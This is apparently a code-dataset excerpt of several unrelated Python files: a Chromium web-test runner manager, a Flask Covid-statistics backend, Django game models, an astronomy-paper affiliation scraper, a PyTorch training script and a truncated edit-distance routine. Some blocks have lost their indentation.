        """Run the tests once, retrying unexpected failures if requested.

        Returns a (initial_results, list_of_retry_results) tuple.
        """
        num_workers = int(
            self._port.num_workers(int(self._options.child_processes)))
        initial_results = self._run_tests(
            tests_to_run, tests_to_skip, self._options.repeat_each,
            self._options.iterations, num_workers)
        # Don't retry failures when interrupted by user or failures limit exception.
        should_retry_failures = (should_retry_failures
                                 and not initial_results.interrupted)
        tests_to_retry = self._tests_to_retry(initial_results)
        all_retry_results = []
        if should_retry_failures and tests_to_retry:
            for retry_attempt in range(1, self._options.num_retries + 1):
                if not tests_to_retry:
                    break
                _log.info('')
                _log.info(
                    'Retrying %s, attempt %d of %d...',
                    grammar.pluralize('unexpected failure',
                                      len(tests_to_retry)), retry_attempt,
                    self._options.num_retries)
                retry_results = self._run_tests(
                    tests_to_retry,
                    tests_to_skip=set(),
                    repeat_each=1,
                    iterations=1,
                    num_workers=num_workers,
                    retry_attempt=retry_attempt)
                all_retry_results.append(retry_results)
                tests_to_retry = self._tests_to_retry(retry_results)
        return (initial_results, all_retry_results)
    def _restore_order(self, paths, test_names):
        """Reorder test_names to follow the user-specified path order."""
        original_test_names = list(test_names)
        test_names = []
        for path in paths:
            for test in original_test_names:
                if test.startswith(path) or fnmatch.fnmatch(test, path):
                    test_names.append(test)
        # Append any tests that did not match a path, preserving no order.
        test_names += list(set(original_test_names) - set(test_names))
        return test_names
    def _collect_tests(self, args):
        """Find the tests to run, honoring test lists and filter options."""
        return self._finder.find_tests(
            args,
            test_lists=self._options.test_list,
            filter_files=self._options.isolated_script_test_filter_file,
            fastest_percentile=self._options.fastest,
            filters=self._options.isolated_script_test_filter)
    def _is_http_test(self, test):
        """Return True if the test lives under an http/ (or websocket) dir."""
        return (
            test.startswith(self.HTTP_SUBDIR + self._port.TEST_PATH_SEPARATOR)
            or self._is_websocket_test(test) or self._port.TEST_PATH_SEPARATOR
            + self.HTTP_SUBDIR + self._port.TEST_PATH_SEPARATOR in test)
    def _is_websocket_test(self, test):
        """Return True if the test needs the legacy websocket server."""
        if self._port.should_use_wptserve(test):
            return False
        return self.WEBSOCKET_SUBDIR + self._port.TEST_PATH_SEPARATOR in test
    def _http_tests(self, test_names):
        """Return the subset of test_names that are http tests."""
        return set(test for test in test_names if self._is_http_test(test))
    def _is_perf_test(self, test):
        """Return True if the test is a performance test."""
        return (self.PERF_SUBDIR == test
                or (self.PERF_SUBDIR + self._port.TEST_PATH_SEPARATOR) in test)
    def _prepare_lists(self, paths, test_names):
        """Split test_names into (tests_to_run, tests_to_skip)."""
        tests_to_skip = self._finder.skip_tests(paths, test_names,
                                                self._expectations)
        tests_to_run = [
            test for test in test_names if test not in tests_to_skip
        ]
        return tests_to_run, tests_to_skip
    def _test_input_for_file(self, test_file, retry_attempt):
        """Build a TestInput with the appropriate timeout and locking."""
        return TestInput(
            test_file,
            self._options.slow_timeout_ms
            if self._test_is_slow(test_file) else self._options.timeout_ms,
            self._test_requires_lock(test_file),
            retry_attempt=retry_attempt)
    def _test_requires_lock(self, test_file):
        """Returns True if the test needs to be locked when running multiple
        instances of this test runner.
        Perf tests are locked because heavy load caused by running other
        tests in parallel might cause some of them to time out.
        """
        return self._is_perf_test(test_file)
    def _test_is_slow(self, test_file):
        """Return True if the test is marked slow in expectations or by the port."""
        if not self._expectations:
            return False
        is_slow_test = self._expectations.get_expectations(
            test_file).is_slow_test
        return is_slow_test or self._port.is_slow_wpt_test(test_file)
    def _needs_servers(self, test_names):
        """Return True if any test in test_names requires an HTTP server."""
        return any(
            self._is_http_test(test_name) for test_name in test_names)
    def _set_up_run(self, test_names):
        """Check the build, rotate old results, and prepare the output dir.

        Returns an exit code; OK_EXIT_STATUS on success.
        """
        self._printer.write_update('Checking build ...')
        if self._options.build:
            exit_code = self._port.check_build(
                self._needs_servers(test_names), self._printer)
            if exit_code:
                _log.error('Build check failed')
                return exit_code
        if self._options.clobber_old_results:
            self._port.clobber_old_results()
        elif self._filesystem.exists(self._artifacts_directory):
            self._port.limit_archived_results_count()
            # Rename the existing results folder for archiving.
            self._port.rename_results_folder()
        # Create the output directory if it doesn't already exist.
        self._port.host.filesystem.maybe_make_directory(
            self._artifacts_directory)
        exit_code = self._port.setup_test_run()
        if exit_code:
            _log.error('Build setup failed')
            return exit_code
        # Check that the system dependencies (themes, fonts, ...) are correct.
        if not self._options.nocheck_sys_deps:
            self._printer.write_update('Checking system dependencies ...')
            exit_code = self._port.check_sys_deps()
            if exit_code:
                return exit_code
        return exit_codes.OK_EXIT_STATUS
    def _run_tests(self,
                   tests_to_run,
                   tests_to_skip,
                   repeat_each,
                   iterations,
                   num_workers,
                   retry_attempt=0):
        """Expand repeats/iterations into TestInputs and hand off to the runner."""
        test_inputs = []
        for _ in range(iterations):
            for test in tests_to_run:
                for _ in range(repeat_each):
                    test_inputs.append(
                        self._test_input_for_file(test, retry_attempt))
        return self._runner.run_tests(self._expectations, test_inputs,
                                      tests_to_skip, num_workers,
                                      retry_attempt)
    def _start_servers(self, tests_to_run):
        """Start only the helper servers that the selected tests need."""
        if any(self._port.is_wpt_test(test) for test in tests_to_run):
            self._printer.write_update('Starting WPTServe ...')
            self._port.start_wptserve()
            self._wptserve_started = True
        if (self._port.requires_http_server()
                or any(self._is_http_test(test) for test in tests_to_run)):
            self._printer.write_update('Starting HTTP server ...')
            self._port.start_http_server(
                additional_dirs={},
                number_of_drivers=self._options.max_locked_shards)
            self._http_server_started = True
        if any(self._is_websocket_test(test) for test in tests_to_run):
            self._printer.write_update('Starting WebSocket server ...')
            self._port.start_websocket_server()
            self._websockets_server_started = True
    def _stop_servers(self):
        """Stop whichever helper servers were started for this run."""
        if self._wptserve_started:
            self._printer.write_update('Stopping WPTServe ...')
            self._wptserve_started = False
            self._port.stop_wptserve()
        if self._http_server_started:
            self._printer.write_update('Stopping HTTP server ...')
            self._http_server_started = False
            self._port.stop_http_server()
        if self._websockets_server_started:
            self._printer.write_update('Stopping WebSocket server ...')
            self._websockets_server_started = False
            self._port.stop_websocket_server()
    def _clean_up_run(self):
        """Flush output streams, clean up the port, and close the result sink."""
        _log.debug('Flushing stdout')
        sys.stdout.flush()
        _log.debug('Flushing stderr')
        sys.stderr.flush()
        _log.debug('Cleaning up port')
        self._port.clean_up_test_run()
        if self._sink:
            _log.debug('Closing sink')
            self._sink.close()
    def _look_for_new_crash_logs(self, run_results, start_time):
        """Looks for and writes new crash logs, at the end of the test run.
        Since crash logs can take a long time to be written out if the system is
        under stress, do a second pass at the end of the test run.
        Args:
            run_results: The results of the test run.
            start_time: Time the tests started at. We're looking for crash
                logs after that time.
        """
        crashed_processes = []
        test_to_crash_failure = {}
        # reset static variables for Failure type classes
        test_failures.AbstractTestResultType.port = self._port
        test_failures.AbstractTestResultType.result_directory = self._results_directory
        test_failures.AbstractTestResultType.filesystem = self._filesystem
        for test, result in run_results.unexpected_results_by_name.items():
            if result.type != ResultType.Crash:
                continue
            for failure in result.failures:
                if (not isinstance(failure, test_failures.FailureCrash)
                        or failure.has_log):
                    continue
                crashed_processes.append(
                    [test, failure.process_name, failure.pid])
                test_to_crash_failure[test] = failure
        sample_files = self._port.look_for_new_samples(crashed_processes,
                                                       start_time) or {}
        for test, sample_file in sample_files.items():
            test_failures.AbstractTestResultType.test_name = test
            test_result = run_results.unexpected_results_by_name[test]
            artifact_relative_path = self._port.output_filename(
                test, test_failures.FILENAME_SUFFIX_SAMPLE, '.txt')
            artifacts_sub_dir = test_result.artifacts.ArtifactsSubDirectory()
            artifact_abspath = self._filesystem.join(self._results_directory,
                                                     artifacts_sub_dir,
                                                     artifact_relative_path)
            self._filesystem.maybe_make_directory(
                self._filesystem.dirname(artifact_abspath))
            self._filesystem.copyfile(sample_file, artifact_abspath)
            test_result.artifacts.AddArtifact(
                'sample_file',
                self._filesystem.join(artifacts_sub_dir,
                                      artifact_relative_path))
        new_crash_logs = self._port.look_for_new_crash_logs(
            crashed_processes, start_time) or {}
        for test, (crash_log, crash_site) in new_crash_logs.items():
            test_failures.AbstractTestResultType.test_name = test
            # NOTE(review): `failure` here is the leftover loop variable from
            # the crash-collection loop above, not the failure for this `test`;
            # it looks like this should be test_to_crash_failure[test] — confirm.
            failure.crash_log = crash_log
            failure.has_log = self._port.output_contains_sanitizer_messages(
                failure.crash_log)
            test_result = run_results.unexpected_results_by_name[test]
            test_result.crash_site = crash_site
            test_to_crash_failure[test].create_artifacts(
                test_result.artifacts, force_overwrite=True)
    def _tests_to_retry(self, run_results):
        """Return the names of tests whose unexpected result was not a pass."""
        # TODO(ojan): This should also check that result.type != test_expectations.MISSING
        # since retrying missing expectations is silly. But that's a bit tricky since we
        # only consider the last retry attempt for the count of unexpected regressions.
        return [
            result.test_name
            for result in run_results.unexpected_results_by_name.values()
            if result.type != ResultType.Pass
        ]
    def _write_json_files(self, summarized_full_results,
                          summarized_failing_results, initial_results,
                          running_all_tests, run_histories):
        """Write timing, stats, and result-summary JSON files for this run."""
        _log.debug("Writing JSON files in %s.", self._artifacts_directory)
        # FIXME: Upload stats.json to the server and delete times_ms.
        times_trie = json_results_generator.test_timings_trie(
            initial_results.results_by_name.values())
        times_json_path = self._filesystem.join(self._artifacts_directory,
                                                'times_ms.json')
        json_results_generator.write_json(self._filesystem, times_trie,
                                          times_json_path)
        # Save out the times data so we can use it for --fastest in the future.
        if running_all_tests:
            bot_test_times_path = self._port.bot_test_times_path()
            self._filesystem.maybe_make_directory(
                self._filesystem.dirname(bot_test_times_path))
            json_results_generator.write_json(self._filesystem, times_trie,
                                              bot_test_times_path)
        stats_trie = self._stats_trie(initial_results)
        stats_path = self._filesystem.join(self._artifacts_directory,
                                           'stats.json')
        self._filesystem.write_text_file(stats_path, json.dumps(stats_trie))
        full_results_path = self._filesystem.join(self._artifacts_directory,
                                                  'full_results.json')
        json_results_generator.write_json(
            self._filesystem, summarized_full_results, full_results_path)
        full_results_jsonp_path = self._filesystem.join(
            self._artifacts_directory, 'full_results_jsonp.js')
        json_results_generator.write_json(
            self._filesystem,
            summarized_full_results,
            full_results_jsonp_path,
            callback='ADD_FULL_RESULTS')
        failing_results_path = self._filesystem.join(self._artifacts_directory,
                                                     'failing_results.json')
        # We write failing_results.json out as jsonp because we need to load it
        # from a file url for results.html and Chromium doesn't allow that.
        json_results_generator.write_json(
            self._filesystem,
            summarized_failing_results,
            failing_results_path,
            callback='ADD_RESULTS')
        if self._options.json_test_results:
            json_results_generator.write_json(self._filesystem,
                                              summarized_full_results,
                                              self._options.json_test_results)
        if self._options.write_run_histories_to:
            json_results_generator.write_json(
                self._filesystem, run_histories,
                self._options.write_run_histories_to)
        _log.debug('Finished writing JSON files.')
    def _copy_results_html_file(self, destination_dir, filename):
        """Copies a file from the template directory to the results directory."""
        files_to_copy = [filename, filename + ".version"]
        template_dir = self._path_finder.path_from_blink_tools(
            'blinkpy', 'web_tests')
        for filename in files_to_copy:
            source_path = self._filesystem.join(template_dir, filename)
            destination_path = self._filesystem.join(destination_dir, filename)
            # Note that the results.html template file won't exist when
            # we're using a MockFileSystem during unit tests, so make sure
            # it exists before we try to copy it.
            if self._filesystem.exists(source_path):
                self._filesystem.copyfile(source_path, destination_path)
    def _stats_trie(self, initial_results):
        """Build the per-test timing/worker stats trie written to stats.json."""
        def _worker_number(worker_name):
            return int(worker_name.split('/')[1]) if worker_name else -1
        stats = {}
        for result in initial_results.results_by_name.values():
            if result.type != ResultType.Skip:
                stats[result.test_name] = {
                    'results': (_worker_number(result.worker_name),
                                result.test_number, result.pid,
                                int(result.test_run_time * 1000),
                                int(result.total_run_time * 1000))
                }
        stats_trie = {}
        for name, value in stats.items():
            json_results_generator.add_path_to_trie(name, value, stats_trie)
        return stats_trie
|
8,034 | 40e2b695d8aaaa82cb90694b85d12061b4e6eca8 | import matplotlib.pyplot as plt
# Scatter-plot n^3 for n = 1..5000, colored by value on a blue colormap.
x_int = list(range(1, 5001))
y_int = [pow(value, 3) for value in x_int]
plt.scatter(x_int, y_int,
            c=y_int, cmap=plt.cm.Blues, s=40)
plt.show()
|
8,035 | 8d48b5b831edb62b2d9624bc23cae45d390fd224 | # pylint: disable=C0103, C0413, E1101, W0611
"""Covid Catcher Backend"""
import os
from os.path import join, dirname
import json
import requests
import flask
from flask import request
import flask_sqlalchemy
import flask_socketio
from dotenv import load_dotenv
from covid import get_covid_stats_by_state
from covid import get_covid_stats_by_county
from covid import get_covid_stats_for_all_states
from faq import get_all_questions
from faq import get_all_categories
from faq import FAQ
import news
from news import get_news
import location
from location import get_location
import sites
from sites import get_sites
from sites import search_user
from sites import TestingSites
app = flask.Flask(__name__)
socketio = flask_socketio.SocketIO(app)
socketio.init_app(app, cors_allowed_origins="*")
dotenv_path = join(dirname(__file__), "sql.env")
load_dotenv(dotenv_path)
dotenv_path = join(dirname(__file__), "api-keys.env")
load_dotenv(dotenv_path)
database_uri = os.environ["DATABASE_URL"]
api_k = os.environ["MAP_API_KEY"]
app.config["SQLALCHEMY_DATABASE_URI"] = database_uri
login = 0
db = flask_sqlalchemy.SQLAlchemy(app)
db.init_app(app)
db.app = app
USERS_UPDATED_CHANNEL = "users updated"
STATISTICS = "stats"
NEWUSER = "new user"
FAQS = "faq lists"
ARTICLE = "article list"
SITE = "site page"
SEARCH = "searching"
import models
def emit_all_users(channel):
    """Broadcast the names of every stored user on `channel`.

    Returns the channel name it emitted on.
    """
    all_users = [user.name for user in db.session.query(models.User1).all()]
    socketio.emit(channel, {"allUsers": all_users})
    return channel
def push_stat_data(state):
    """Fetch state- and county-level covid stats and emit them to the caller.

    Emits on the STATISTICS channel, scoped to the requesting socket
    (room=request.sid), with parallel per-county lists.
    """
    information = get_covid_stats_by_state(state)
    print(state)
    case = information.cases
    newCases = information.todaysCases
    death = information.deaths
    newDeaths = information.todayDeaths
    rec = information.recovered
    county_list = []
    county_confirmed = []
    county_deaths = []
    county_rec = []
    updated = []
    print("CASES DEATHS AND RECOVERED: ", case, death, rec)
    # Empty county string asks the API for every county in the state.
    allcounty = get_covid_stats_by_county(state, "")
    for x in allcounty:
        county_list.append(x.county)
        county_confirmed.append(x.confirmed)
        county_deaths.append(x.deaths)
        county_rec.append(x.recovered)
        updated.append(x.updatedAt)
    socketio.emit(
        STATISTICS,
        {
            "state": state,
            "cases": case,
            "new_cases": newCases,
            "deaths": death,
            "new_deaths": newDeaths,
            "recovered": rec,
            "countyNames": county_list,
            "countyCases": county_confirmed,
            "countyDeaths": county_deaths,
            "countyRecovered": county_rec,
            "updated": updated,
        },
        room=request.sid,
    )
    r = "stats are pushed"
    return r
@socketio.on("new google user")
def on_new_google_user(data):
    """Handle a Google sign-in: persist the user and rebroadcast the roster.

    `data` must carry "name", "email", "pic" and "room" keys.
    """
    print("Got an event for new google user input with data:", data)
    push_new_user_to_db(data["name"], data["email"], data["pic"], data["room"])
    emit_all_users(USERS_UPDATED_CHANNEL)
    return USERS_UPDATED_CHANNEL
@socketio.on("email results")
def on_send_results(data):
    """Email the questionnaire results in data['results'] via Mailgun."""
    # This name would be the user but mailgun will not allow emails to be sent to
    # unverified users without paying.
    name="Madison"
    msg = "Hello "+name+"! After taking your questionnaire us here at Covid Catcher recommended the following...\n"
    msg += data['results']
    print(msg)
    print(requests.post(
        "https://api.mailgun.net/v3/sandbox65fda9f953cb42baacd1bdd34356b8c4.mailgun.org/messages",
        auth=("api", os.environ["MAIL_API_KEY"]),
        data={"from": "Excited User <mailgun@sandbox65fda9f953cb42baacd1bdd34356b8c4.mailgun.org>",
        # This only sends to madison because mailgun for free can only send to verified emails.
        # To send to the specific user's email simply pull the email from the database at this
        # socket number and send it there.
        "to": ["miatkem@gmail.com"],
        "subject": "Covid Catcher Questionnaire Results",
        "text":msg}).text)
@socketio.on("faq categories")
def on_faq_categories():
    """Emit the list of FAQ categories on the "faq category list" event."""
    categories = get_all_categories()
    socketio.emit("faq category list", categories)
@socketio.on("faq questions")
def on_faq_questions(category):
    """Emit question/answer pairs for `category` on the "faq list" event.

    A missing, None, or empty category returns every FAQ.
    """
    # Idiomatic truthiness test replaces `category == "" or category == None`.
    if category:
        faqs = get_all_questions(category)
    else:
        faqs = get_all_questions()
    response = [
        {
            "question": faq.question,
            "answer": faq.answer,
        }
        for faq in faqs
    ]
    socketio.emit("faq list", response)
def push_new_user_to_db(name, email, picture, room):
    """Insert a user (deduplicated by email), mark login, and rebroadcast.

    Side effects: sets the module-level `login` flag, triggers userLog()
    and emits the updated roster. Returns the user's name.
    """
    global login
    all_users = [user.email for user in db.session.query(models.User1).all()]
    if email in all_users:
        print(email, " is already a user in the database!")
    else:
        db.session.add(models.User1(name, email, picture, room))
        db.session.commit()
    login = 1
    userLog()
    emit_all_users(USERS_UPDATED_CHANNEL)
    return name
def get_state_colors():
    """Emit per-state map colors, case counts and active counts ("colors")."""
    state_colors = []
    state_cases = []
    state_active = []
    for i in get_covid_stats_for_all_states():
        state_colors.append(i.color)
        state_cases.append(i.cases)
        state_active.append(i.activeCases)
    socketio.emit(
        "colors", {"colors": state_colors, "cases": state_cases, "active": state_active}
    )
def userLog():
    """Notify clients on NEWUSER when the module-level `login` flag is set."""
    if login == 1:
        socketio.emit(NEWUSER, {"login": 1})
    # NOTE(review): returns True unconditionally; callers ignore the value.
    return True
@socketio.on("search loc")
def search_loc(data):
    """Push covid stats for the state named in data["loc"]."""
    state = data["loc"]
    push_stat_data(state)
@socketio.on("connect")
def on_connect():
    """On socket connect: push articles, map colors, and local covid stats.

    Geolocates the client from the X-Forwarded-For header (assumes the app
    runs behind a proxy that sets it -- raises KeyError otherwise).
    """
    articleList()
    #test_location()
    get_state_colors()
    ip = request.environ["HTTP_X_FORWARDED_FOR"]
    loc = get_location(ip)
    push_stat_data(loc.state)
    return True
@socketio.on("search location")
def searching(data):
    """Geocode data["area"] and emit up to 3 nearby testing sites (SITE).

    The payload carries the user's coordinates plus parallel lists of site
    attributes, scoped to the requesting socket.
    """
    a = data["area"]
    # search_user returns (latitude, longitude) for the free-text area.
    areaLoc = search_user(a)
    allsites = get_sites(areaLoc[0], areaLoc[1])
    title_list = []
    address_list = []
    lat_list = []
    lng_list = []
    phone_list = []
    web_list = []
    miles_list = []
    counter = 0
    # Cap the response at the first three sites.
    for site in allsites:
        if counter != 3:
            title_list.append(site.title)
            address_list.append(site.entireAddress)
            lat_list.append(site.latitude)
            lng_list.append(site.longitude)
            phone_list.append(site.phone)
            web_list.append(site.web)
            miles_list.append(site.miles)
            counter += 1
        else:
            break
    socketio.emit(
        SITE,
        {
            "user_lat": areaLoc[0],
            "user_lng": areaLoc[1],
            "title": title_list,
            "address": address_list,
            "latitude": lat_list,
            "longitude": lng_list,
            "phone": phone_list,
            "web": web_list,
            "miles": miles_list,
            "key": api_k,
        }, room=request.sid
    )
    return True
'''
def test_location():
"""Get testing locations"""
ip = request.environ["HTTP_X_FORWARDED_FOR"]
loc = get_location(ip)
lat = loc.latitude
lng = loc.longitude
allsites = get_sites(lat, lng)
title_list = []
address_list = []
lat_list = []
lng_list = []
phone_list = []
web_list = []
miles_list = []
counter = 0
for site in allsites:
if counter != 3:
title_list.append(site.title)
address_list.append(site.entireAddress)
lat_list.append(site.latitude)
lng_list.append(site.longitude)
phone_list.append(site.phone)
web_list.append(site.web)
miles_list.append(site.miles)
counter += 1
else:
break
socketio.emit(
SITE,
{
"user_lat": lat,
"user_lng": lng,
"title": title_list,
"address": address_list,
"latitude": lat_list,
"longitude": lng_list,
"phone": phone_list,
"web": web_list,
"miles": miles_list,
"key": api_k,
},
)
return True'''
def articleList():
    """Fetch up to 5 recent covid articles and emit them on ARTICLE.

    Emits parallel lists of titles, descriptions, URLs, images and sources.
    """
    # BUG FIX: "%yyyy-%mm-%dd" is not a valid strftime pattern (it expands
    # to junk like "%y20%y-%m08%m-..."); "%Y-%m-%d" yields the intended
    # ISO date, e.g. "2020-08-31".
    articles = get_news(
        5, since=news.YESTERDAY.strftime("%Y-%m-%d"), query="covid"
    )
    title_list = []
    desc_list = []
    url_list = []
    image_list = []
    source_list = []
    for art in articles:
        image_list.append(art.image)
        title_list.append(art.title)
        source_list.append(art.source)
        desc_list.append(art.description)
        url_list.append(art.url)
    socketio.emit(
        ARTICLE,
        {
            "title": title_list,
            "desc": desc_list,
            "url": url_list,
            "img": image_list,
            "sources": source_list,
        },
    )
    return True
@app.route("/")
def index():
    """Serve the SPA entry page, creating DB tables on first hit if needed."""
    models.db.create_all()
    db.session.commit()
    return flask.render_template("index.html")
@app.errorhandler(404)
def page_not_found(e):
    """Serve the SPA index for unknown routes (client-side routing).

    NOTE(review): this responds with HTTP 200, not 404 -- presumably
    intentional for the single-page app; confirm.
    """
    return flask.render_template("index.html")
if __name__ == "__main__":
socketio.run(
app,
host=os.getenv("IP", "0.0.0.0"),
port=int(os.getenv("PORT", 8080)),
debug=True,
)
|
8,036 | 092242cdb231e09ccf3dd4dccfb6d786c3e4aad2 | from django.db import models
# Create your models here.
class GameGenre(models.Model):
    """A genre that games can belong to."""
    genreName = models.CharField(max_length=100)
    genreDescription = models.CharField(max_length=300)
    def __str__(self):
        return "%s" % (self.genreName)
class Game(models.Model):
    """A game, categorized under a single genre."""
    gameName = models.CharField(max_length=100)
    # NOTE(review): ForeignKey without on_delete -- valid only on Django < 2.0.
    genre = models.ForeignKey(GameGenre)
    def __str__(self):
        return "%s, %s" % (self.gameName, self.genre)
class Players(models.Model):
    """A player and the set of games they play."""
    playerName = models.CharField(max_length=100)
    games = models.ManyToManyField(Game)
    def __str__(self):
        return "%s" % (self.playerName)
8,037 | 9e314cdf4ef09ecf4a4b43358ae32f76c40aaea8 | import os
import redis
import requests
import lxml.html
ads_api_url = "http://adslabs.org/adsabs/api/search/"
ads_html_url = "http://labs.adsabs.harvard.edu/adsabs/abs/"
rdb = redis.Redis()
def get_dev_key():
    """Return the ADS developer key.

    Prefers the first line of ~/.ads/dev_key, then the ADS_DEV_KEY
    environment variable; raises IOError if neither is available.
    """
    # Credit: Andy Casey
    key_path = os.path.abspath(os.path.expanduser("~/.ads/dev_key"))
    if os.path.exists(key_path):
        with open(key_path, "r") as fh:
            return fh.readline().rstrip()
    env_key = os.environ.get("ADS_DEV_KEY", None)
    if env_key is not None:
        return env_key
    raise IOError("no ADS API key found in ~/.ads/dev_key")
def get_author_locations(author, return_json=False):
    """Query ADS for `author`'s papers and scrape each one's affiliation.

    Returns a list of (year, affiliation) tuples.
    NOTE(review): `return_json` is never used -- presumably a planned
    output switch; confirm before relying on it.
    """
    # Match on the longest comma-separated name component (usually the
    # surname), lower-cased.
    name = sorted([a.strip() for a in author.split(",")], reverse=True,
                  key=lambda n: len(n))[0].lower()
    params = {
        "q": "author:{0}".format(author),
        "dev_key": get_dev_key(),
        "rows": 200,
        "filter": "database:astronomy",
        "fl": "bibcode,year",
    }
    response = requests.post(ads_api_url, params=params)
    if response.status_code != requests.codes.ok:
        response.raise_for_status()
    codes = response.json().get("results", {}).get("docs", None)
    if codes is None:
        return []
    results = [(el.get("bibcode"), el.get("year")) for el in codes]
    affils = []
    for code, year in results:
        if year is None:
            continue
        # Abstract pages are cached in Redis keyed "career:<bibcode>".
        text = rdb.get("career:{0}".format(code))
        if text is None:
            url = ads_html_url + code
            r = requests.get(url)
            if r.status_code != requests.codes.ok:
                r.raise_for_status()
            text = r.text
            rdb.set("career:{0}".format(code), text)
        tree = lxml.html.fromstring(text)
        for author in tree.find_class("author"):
            if name in author.find_class("authorName")[0].text.lower():
                a = author.find_class("authorAffiliation")
                if len(a):
                    affils.append((int(year), a[0].text.strip("()").strip()))
                break
    return affils
if __name__ == "__main__":
print(get_author_locations("foreman-mackey"))
|
8,038 | 92bcfff733e5f305ad1276ceb39a72a8f0fcb214 | import argparse
import tensorboardX as tb
import torch as th
import torch.nn.functional as F
import torch.optim as optim
import torch.utils.data as D
import data
import mlp
import resnet
import utils
parser = argparse.ArgumentParser()
parser.add_argument('--bst', nargs='+', type=int, help='Batch Size for Training')
parser.add_argument('--bsi', type=int, help='Batch Size for Inference')
parser.add_argument('--ds', type=str, help='DataSet')
parser.add_argument('--gpu', type=int, help='GPU')
parser.add_argument('--id', type=str, help='IDentifier')
parser.add_argument('--log-every', type=int, help='LOG statistics EVERY _ iterations')
parser.add_argument('--loss', type=str, help='LOSS')
parser.add_argument('--lr', type=float, help='Learning Rate')
parser.add_argument('--metric', type=str, help='METRIC')
parser.add_argument('--model', type=str, help='MODEL')
parser.add_argument('--ni', type=int, help='Number of Iterations')
parser.add_argument('--opt', type=str, help='OPTimizer')
parser.add_argument('--ptt', nargs='+', type=int, help='ParTiTion')
parser.add_argument('--tb', action='store_true', help='TensorBoard')
parser.add_argument('--w', type=float, help='Weight')
parser.add_argument('--wd', type=float, help='Weight Decay')
args = parser.parse_args()
x, y = {'adult' : data.load_adult,
'cifar10' : data.load_multi_cifar10,
'cifar100' : data.load_multi_cifar100,
'covtype' : data.load_covtype,
'kddcup08' : data.load_kddcup08,
'letter' : data.load_multi_letter,
'mnist' : data.load_multi_mnist}[args.ds]()
x, y = data.shuffle(x, y)
[[train_xx, train_yy],
[val_xx, val_yy],
[test_xx, test_yy]] = data.partition(x, y, args.ptt)
train_x, val_x, test_x = th.cat(train_xx), th.cat(val_xx), th.cat(test_xx)
train_y, val_y, test_y = th.cat(train_yy), th.cat(val_yy), th.cat(test_yy)
train_x, val_x, test_x = data.normalize([train_x, val_x, test_x])
train_xx = th.split(train_x, [len(x) for x in train_xx])
train_datasets = [D.TensorDataset(x) for x in train_xx]
train_loader = D.DataLoader(D.TensorDataset(train_x, train_y), args.bsi)
val_loader = D.DataLoader(D.TensorDataset(val_x, val_y), args.bsi)
test_loader = D.DataLoader(D.TensorDataset(test_x, test_y), args.bsi)
pclass_list = [len(y) / len(train_y) for y in train_yy]
n_classes = len(train_yy)
if len(args.bst) == n_classes:
bs_list = args.bst
elif len(args.bst) == 1:
bs_list = [args.bst[0]] * n_classes
else:
raise RuntimeError()
train_loaders = [utils.cycle(D.DataLoader(ds, bs, shuffle=True)) \
for ds, bs in zip(train_datasets, bs_list)]
# Select the model architecture from --model.
# BUG FIX: the resnet branch previously ended with a stray `[args.model]`
# subscript (leftover from a dict-dispatch refactor), which would fail at
# runtime when indexing the constructed model with a string.
if args.model == 'linear':
    model = th.nn.Linear(train_x.size(1), n_classes)
elif args.model == 'mlp':
    model = mlp.MLP([train_x.size(1), 64, 64, 64, n_classes], th.relu, bn=True)
elif args.model == 'resnet':
    model = resnet.ResNet(18, n_classes)
else:
    raise RuntimeError()
dev = th.device('cpu') if args.gpu < 0 else th.device('cuda:%d' % args.gpu)
model = model.to(dev)
params = list(model.parameters())
kwargs = {'params' : params, 'lr' : args.lr, 'weight_decay' : args.wd}
opt = {'sgd' : optim.SGD(**kwargs),
'adam' : optim.Adam(amsgrad=True, **kwargs)}[args.opt]
metric = getattr(utils, args.metric)
if args.tb:
path = 'tb/%s' % args.id
writer = tb.SummaryWriter(path)
train_writer = tb.SummaryWriter(path + '/a')
val_writer = tb.SummaryWriter(path + '/b')
test_writer = tb.SummaryWriter(path + '/c')
def infer(loader, model):
    """Run `model` over every batch in `loader` on device `dev`.

    Returns (labels, predictions) as two concatenated tensors, where
    predictions are the argmax over the model's output classes.
    """
    yy = []
    y_barr = []
    for x, y in loader:
        x, y = x.to(dev), y.to(dev)
        y_bar = th.max(model(x), 1)[1]
        yy.append(y)
        y_barr.append(y_bar)
    y = th.cat(yy)
    y_bar = th.cat(y_barr)
    return y, y_bar
def log(model, i):
    """Print (and optionally TensorBoard-log) accuracy and the chosen metric
    at iteration `i` for the train/val/test splits."""
    mmm = []
    for loader in train_loader, val_loader, test_loader:
        y, y_bar = infer(loader, model)
        # Plain accuracy plus the multi-class metric from --metric.
        a = th.sum(y == y_bar).item() / len(y)
        fnfn = utils.fn_mc(y, y_bar, n_classes)
        fpfp = utils.fp_mc(y, y_bar, n_classes)
        m = metric(pclass_list, fnfn, fpfp)
        mmm.append([a, m])
    tagg = ['a', args.metric]
    # Zero-pad the iteration number to the width of --ni.
    placeholder = '0' * (len(str(args.ni)) - len(str(i)))
    xx = ['/'.join(['%0.2f' % m for m in mm]) for mm in zip(*mmm)]
    x = ' | '.join('%s %s' % (tag, mm) for tag, mm in zip(tagg, xx))
    print('[iteration %s%d]%s' % ((placeholder, i, x)))
    if args.tb:
        for writer, mm in zip([train_writer, val_writer, test_writer], mmm):
            for tag, m in zip(tagg, mm):
                writer.add_scalar(tag, m, i)
utils.eval(model)
log(model, 0)
for i in range(args.ni):
xx = [next(loader)[0].to(dev) for loader in train_loaders]
x = th.cat(xx)
utils.train(model)
z = F.softmax(model(x), 1)
zz = th.split(z, [len(x) for x in xx])
pneg_list = [1 - th.mean(z[:, i]) for i, z in enumerate(zz)]
fnfn = [p_class * p_neg for p_class, p_neg in zip(pclass_list, pneg_list)]
fpfp = [(1 - p_class) * p_neg for p_class, p_neg in zip(pclass_list, pneg_list)]
if args.w > 0:
loss = sum(args.w * fn + (1 - args.w) * fp for fn, fp in zip(fnfn, fpfp))
else:
loss = -metric(pclass_list, fnfn, fpfp)
opt.zero_grad()
loss.backward()
opt.step()
utils.eval(model)
if (i + 1) % args.log_every == 0:
log(model, i + 1)
|
8,039 | 88390f411af90d494284617ef8f5fb0e9bb8890e | def memo(fn):
cache = {}
missed = object()
def query(*args):
result = cache.get(args, missed)
if result is missed:
result = cache[args] = fn(*args)
return result
return query
@memo
def cal_edit_distance(ori, tar):
    """Return (distance, script) transforming `ori` into `tar`.

    `script` is a newline-joined, human-readable sequence of edit
    operations. Memoized on (ori, tar) via @memo.
    """
    def edit_tuple(old, distance, path):
        # Extend a (distance, script) pair with one more operation.
        return old[0] + distance, old[1] + "\n" + path
    # Base cases: one string exhausted.
    if not ori:
